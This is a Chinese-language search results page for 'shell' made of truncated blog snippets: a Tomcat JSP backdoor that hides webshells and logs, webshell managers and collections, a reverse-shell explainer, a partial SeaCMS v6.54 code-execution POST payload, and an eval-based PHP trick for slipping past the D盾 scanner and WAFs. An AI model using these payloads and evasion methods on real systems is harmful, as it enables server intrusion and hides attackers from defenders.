搜索 “shell”

HideShell后门 HideShell是一个JSP后门木马，除了访问日志之外，还可以在Tomcat下隐藏任意JSP文件（实现隐藏webshell），隐藏访问日志。hideshell.jsp隐藏的JSP在下次重新引导Tomcat实例之前保持accessbile。 支持环境 Tomcat 7Tomcat 8 Hideshell.jsp通过简单删除目标来隐藏JSP文件，同时让Tomcat相信文件仍然存在，从而照常为...

Webshell-Sniper介绍 Webshell-Sniper是一款使用Python编写的基于终端的Webshell​​管理器，和以往我们分享的Webshell管理工具有所不同，所有操作都在终端中完成。使用它可对您的网站进行远程管理。虽然它没有图形化的GUI也没有WEB界面，但这样的操作也是另有一翻感觉。 功能 基于终端的shell交互反向连接shell（这就能做非常多的事...

webshell 这是一个webshell收集项目，本项目涵盖各种常用脚本 如：asp,aspx,php,jsp,pl,py 你还可以提交各种webshell给该项目，请勿更改名称和密码 注意：所有webshell不保证无后门 本项目提供的工具，禁止从事非法活动，此项目，仅供测试，所造成的一切后果，与本人无关。 webshell webshell下载地址 https://gith...

什么是反弹shell reverse shell（反弹shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我...

海洋CMS v6.54漏洞 漏洞代码执行 Payload get： http://seacms.test/search.php POST： searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:v...

在先知上看到了一个shell过D盾的思路，同样可用来过其它waf。 D盾扫描结果 以前的思路常规，就是定义一个变量b：$b='';为空，$b = null;，$b = "\n";然后变量a： $a = $_GET['1'];，eval($a.$b);，或者eval($b.=$a); 。但是现在这种方法基本报一级或者直接杀，查出某个变量。 <?php $m=$_...

WebShell管理工具 中国蚁剑AntSword中国菜刀 (caidao)冰蝎 webshellcknife (c刀)xiseQuasiBotWeBaCooWeevelyFastenerAltmanWebshell-Sniper webshell过waf技巧，别用默认的流量特征，自定义通信，分块传输，动态加密。